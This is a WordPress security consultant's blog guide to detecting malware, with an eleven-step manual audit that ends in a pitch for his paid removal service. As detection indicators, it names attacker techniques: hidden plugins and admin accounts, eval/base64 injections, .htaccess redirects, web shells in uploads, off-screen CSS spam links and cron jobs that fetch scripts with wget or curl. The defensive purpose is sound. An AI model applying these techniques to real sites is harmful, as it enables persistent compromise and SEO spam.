How to Detect WordPress Malware Before It Ruins Your Business
Quick Summary: Finding the Invisible Hack
The Core Problem: Hackers no longer break your site visually. They want your site to look normal to you while they steal your traffic, hijack your customers, or send out spam. Learning how to detect WordPress malware manually is the only way to protect your business.
The Symptoms: Sudden drops in SEO traffic, complaints from mobile users, weird pop-ups, or Google Blacklist warnings.
The Process: Automated tools are not enough. You must combine frontend scanners, deep server-level audits, database scrubbing, and visual file comparisons to find hidden backdoors.
The Tools You Need: FTP access (or a File Manager), phpMyAdmin (database access), Google Chrome Developer Tools, and a reliable security plugin.
Every single day, I get emails from business owners asking the exact same question: “Pabel, my traffic is dropping and my customers are complaining about spam, but my site looks fine to me. Exactly how do I know if I am hacked?”
If you are asking how to detect WordPress malware, you are already one step ahead of most website owners. Hackers today are financially motivated. They do not want to deface your website with a scary skull and crossbones. That alerts you to the problem. Instead, they write stealthy code that hides from you while secretly redirecting your search engine traffic to illegal casinos, pharmacies, or phishing pages.
After manually cleaning and restoring more than 4,500 hacked WordPress websites, I have developed a foolproof forensic audit process. Automated security plugins are great, but they often miss the smartest infections.
If you want to know how to detect WordPress malware like a professional security expert, follow this exact 11-step manual auditing guide.
Phase 1: The Automated Surface Scans
When figuring out how to detect WordPress malware, we always start with the easiest, fastest checks. These automated tools will catch the obvious, surface-level infections before we dig into the server.
1. Run a Frontend Scan with Sucuri SiteCheck
Your first step is to use a free online scanner like sitecheck.sucuri.net. This tool acts like a regular visitor visiting your website. It does not look at your server files; it only looks at the final code that your site renders on the screen.
This is highly effective for finding frontend malware. If a hacker has injected malicious scripts into your active theme, your core files, or your database, and that script executes in the visitor’s browser, Sucuri will flag it. It is the quickest way to see what your website is actively serving to the public.
2. Check Blacklists Using VirusTotal
Sometimes, the malware is conditional and hides from Sucuri. However, if your site has been infected for a while, global security authorities might have already caught it. Go to VirusTotal.com and paste your domain URL.
VirusTotal runs your domain against over 70 different antivirus engines and website blacklists (including Google Safe Browsing, McAfee, and Norton). If two or three of these engines flag your site as malicious, it is a massive red flag that you have a hidden infection.
3. Run a Sensitive Scan with Wordfence
Online scanners cannot see inside your server. For that, you need an internal tool. Install the free version of the Wordfence plugin. However, the default scan settings are not enough when you are learning how to detect WordPress malware.
Go to the Wordfence scan options and switch the scan type to “High Sensitivity.” Furthermore, check the boxes to scan files outside your WordPress installation and to scan image files as if they were executable. This deep scan takes longer, but it will detect the majority of common PHP backdoors and Base64 encoded payloads hiding in your system.
Phase 2: How to Detect WordPress Malware Hiding in Your Dashboard
Hackers know that you check your WordPress dashboard regularly. To survive, they have developed clever tricks to hide their malicious assets right under your nose. Here is how to detect WordPress malware that is actively lying to you.
4. The “Math Trick” for Finding Hidden Plugins
As I mentioned in many of my case studies, roughly 70% of the hacked sites I clean involve fake hidden plugins. Hackers upload a malicious plugin to your server, but they add a line of PHP code that completely hides it from your “Installed Plugins” list in the dashboard.
To find them, you must do a simple counting exercise:
- Log into your WordPress Dashboard and count the exact number of plugins listed on the plugins page. Let’s say you count 15.
- Log into your web hosting File Manager or use an FTP client like FileZilla. Navigate to the
wp-content/plugins/directory. - Count the physical folders.
If you have 15 plugins in the dashboard, but you count 16 physical folders on the server, you have just found your malware. Delete the rogue folder immediately.
5. Hunt Down Invisible “Ghost” Admin Users
Just like plugins, hackers will create new Administrator accounts so they can log back into your site whenever they want. And just like plugins, they will use code to hide these users from your “All Users” list in the dashboard.
If you want to know how to detect WordPress malware user accounts, you must check the database directly. Open phpMyAdmin from your hosting control panel. Find your database and click on the wp_users table (your prefix might be different, like xyz_users).
Look at the list of registered users in the database and compare it to the list in your WordPress dashboard. If you see strange email addresses or usernames in the database that do not exist in the dashboard, a hacker has compromised your site.
Phase 3: How to Detect WordPress Malware Using Your Browser
Sometimes, the best way to find an infection is to look at exactly what your web browser is downloading when it visits your site.
6. Inspect the Raw Source Code
Open your website in Google Chrome, right-click anywhere on the page, and select “View Page Source.” This opens a new tab showing the raw HTML of your website.
You do not need to be an expert coder to spot something suspicious. Scroll to the very bottom (right before the closing </html> tag) and the very top (inside the <head> tags). Look for massive blocks of unreadable, scrambled text (Base64 encoding) or strange links to websites selling pharmaceuticals, cryptocurrency, or foreign language products. If you see links in the source code that are not visible on the actual webpage, you are hacked.
7. Monitor the Browser Network Tab
Modern malware often pulls malicious scripts from external servers. You can catch this behavior using Developer Tools.
Right-click on your website, select “Inspect,” and click on the “Network” tab. Refresh your page. You will see a waterfall list of every single file, image, and script your website is loading. Look at the “Domain” column. You should only see your domain name, Google (for analytics/fonts), and maybe a few trusted third-party tools (like Facebook or a chat widget). If you see the browser downloading scripts from bizarre, random domain names, your site is infected with a redirector or a crypto-miner.
Phase 4: Deep Server and Database Auditing
If the surface-level checks come back clean, but you are still losing traffic, we have to dig deep. This is how to detect WordPress malware at the root level.
8. Audit Your Core System Files
Hackers love to hijack the files that control how your server operates. You need to open your File Manager and inspect these specific files:
- The .htaccess file: This file controls traffic routing. If you open it and see hundreds of lines of code mentioning
RewriteCond %{HTTP_REFERER}or targeting search engines like Google and Bing, you have SEO redirect malware. - The wp-config.php file: This file connects your site to your database. Hackers will sometimes place malicious
include()oreval()functions at the very top of this file to ensure their malware loads before WordPress even starts. - WordPress Core Files: Files like
index.php,wp-blog-header.php, andwp-load.phpshould never be modified. If the “Last Modified” date on these files is recent, they have been compromised.
9. Search for Rogue PHP Files in the Uploads Folder
Your wp-content/uploads/ folder is designed exclusively for media. It should only contain images (JPG, PNG, WebP), PDFs, SVGs, or maybe audio files.
There should never be a .php file inside your uploads folder.
Hackers use the media uploader to sneak PHP web shells into your system. Once uploaded, they can use this script to control your server remotely. Open your uploads directory and use the search function to look for .php. If you find a PHP file hiding among your images, you have found a critical backdoor.
10. Deep Scan the Database for Malicious Payloads
Next, we must check the database for injected spam. Hackers will hide malicious links or scripts inside your pages and posts using CSS tricks so they are invisible to the human eye, but highly visible to Google’s crawlers.
Log into phpMyAdmin, select your database, and click the “Search” tab. You want to search all of your tables (especially wp_options and wp_posts) for these specific triggers:
<script(Look for scripts loading from strange external URLs).position: absolute(Hackers use this to move text off the screen).left: -9999pxorright: -9999px(A classic black-hat SEO trick to hide thousands of spam links way off the edge of the monitor).
If your database search returns rows containing these CSS tricks wrapped around links to casinos or adult sites, your database has been successfully breached.
11. Inspect Cron Jobs for Auto-Reinfection Malware
If you keep cleaning your site but the virus comes back every morning at 2:00 AM, you are dealing with a scheduled task. Knowing how to detect WordPress malware inside cron jobs is crucial for permanent removal.
Hackers inject malicious cron jobs into your WordPress system to automatically reinstall backdoors. To find them, install the free WP Crontrol plugin. Go to Tools > Cron Events. Look for scheduled tasks with bizarre, random names (like wp_auto_update_xyz or random strings of letters) that execute suspicious PHP functions like eval() or base64_decode().
Additionally, log into your hosting control panel (like cPanel) and check the server-level “Cron Jobs” section. If you see a command executing a hidden .php file or downloading a script via wget or curl, delete it immediately. That is the engine driving the reinfection.
You Found the Malware. What Now?
Learning how to detect WordPress malware is only the first half of the battle. Removing it permanently is a highly technical, high-stakes operation. If you simply delete the malicious code you found without closing the backdoor vulnerability, automated bots will reinfect your website in less than 24 hours.
A proper cleanup requires replacing core files, safely dropping infected database rows, purging server-level caches, auditing cron jobs, and hardening your security perimeter to block future attacks.
If you have followed this guide and discovered that your business website is compromised, you do not have to fix it alone. One wrong click in your database or server files can break your website entirely.
I can take the stress off your shoulders today. Request my professional WordPress malware removal service. I will manually perform a deep forensic audit, surgically extract every hidden backdoor, scrub your database, and lock down your server so you can get back to running your business with peace of mind.
